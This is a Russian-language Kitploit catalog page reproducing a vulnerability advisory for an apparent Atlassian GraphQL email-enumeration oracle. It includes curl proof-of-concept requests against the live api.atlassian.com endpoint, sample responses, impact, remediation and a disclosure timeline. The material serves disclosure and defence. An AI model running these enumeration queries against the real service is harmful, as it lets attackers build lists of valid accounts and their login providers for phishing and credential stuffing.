Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-XXXX-atlassian-email-enumeration — CVE-2026-XXXX: Atlassian GraphQL Оракул перечисления email (CWE-204, CVSS 5.3 MEDIUM) | Kitploit
Инструменты/GitHubGitHub/wh4l3x/cve-2026-xxxx-atlassian-email-enumeration
OSINT (Разведка открытых источников)Инструменты фишингаРазведкаАнализ уязвимостейСбор информацииВеб-безопасностьСоциальная инженерияСбор Электронной Почты

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
wh4l3x/cve-2026-xxxx-atlassian-email-enumeration

CVE-2026-XXXX-atlassian-email-enumeration

CVE-2026-XXXX: Atlassian GraphQL Оракул перечисления email (CWE-204, CVSS 5.3 MEDIUM)

Репозиторий
11 месяц назадЕщё не проверено

CVE-2026-XXXX: Atlassian Central GraphQL — Оракул перечисления email

Продукт

Atlassian Central GraphQL Gateway (api.atlassian.com/graphql)

Тип уязвимости

CWE-204: Observable Response Discrepancy — Оракул перечисления email

Серьезность

СРЕДНИЙ — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Описание

GraphQL-запрос loomUnauthenticated_primaryAuthTypeForEmail на центральном GraphQL-шлюзе Atlassian возвращает разные ответы в зависимости от того, зарегистрирован ли email-адрес в Atlassian, что позволяет перечислять пользователей без аутентификации.

Зарегистрированный email → возвращает authType (например, workos, password, google) и URI перенаправления Незарегистрированный email → возвращает authType: "none" без URI перенаправления

Аутентификация не требуется. Имя запроса содержит "Unauthenticated" — он намеренно публичен, но не должен раскрывать, есть ли у произвольного email учетная запись Atlassian.

Затронутые версии

  • Atlassian Central GraphQL Gateway (снимок 37157, сборка 2026-07-02)
  • Конечная точка: https://api.atlassian.com/graphql

Доказательство концепции

Зарегистрированный email (возвращает провайдера аутентификации):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'

Ответ:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "workos",
      "hasActiveMemberships": false,
      "redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
    }
  }
}

Незарегистрированный email (возвращает none):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'

Ответ:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "none"
    }
  }
}

Также раскрывает: сопоставление email → провайдер аутентификации

authType: "workos" подтверждает, что email использует WorkOS SSO. authType: "google" или authType: "password" раскроет метод аутентификации. Это позволяет проводить целевой фишинг.

Влияние

Неаутентифицированный злоумышленник может:

  • Перечислять зарегистрированные учетные записи Atlassian/Loom в большом объеме
  • Сопоставлять email-адреса с их провайдером аутентификации (Google SSO, WorkOS, password)
  • Использовать информацию о провайдере аутентификации для целевых фишинговых кампаний
  • Составлять списки действительных пользователей Atlassian для атак перебором учетных данных

Первопричина

Запрос loomUnauthenticated_primaryAuthTypeForEmail не выполняет ограничение частоты и возвращает информацию о провайдере аутентификации для любого email без аутентификации. Хотя конечная точка намеренно неаутентифицирована (для процесса регистрации Loom), она раскрывает, есть ли у email учетная запись и какой провайдер аутентификации используется.

Устранение

  1. Добавьте ограничение частоты для предотвращения массового перечисления
  2. Возвращайте единообразный ответ как для зарегистрированных, так и для незарегистрированных email
  3. ИЛИ: требуйте CAPTCHA/nonce перед запросом статуса email

Чем это НЕ является

После тщательного тестирования эти утверждения были опровергнуты:

  • ❌ Нет JWT-токена с привилегиями (токены имеют aaid: "unidentified")
  • ❌ Нет выполнения мутаций администратора (все завершаются ошибкой ValidationError)
  • ❌ Нет обхода аутентификации (шлюз правильно идентифицирует вызывающего как unidentified)
  • ❌ Нет утечки данных помимо сопоставления email/провайдер аутентификации

Хронология

  • 2026-06-30: Обнаружена
  • 2026-06-30: Сообщена на [email protected]
  • 2026-07-02: Исправлена оценка — понижена с Критического (9.8) до Среднего (5.3)

Обнаружена

Wh4l3X

Скачать инструмент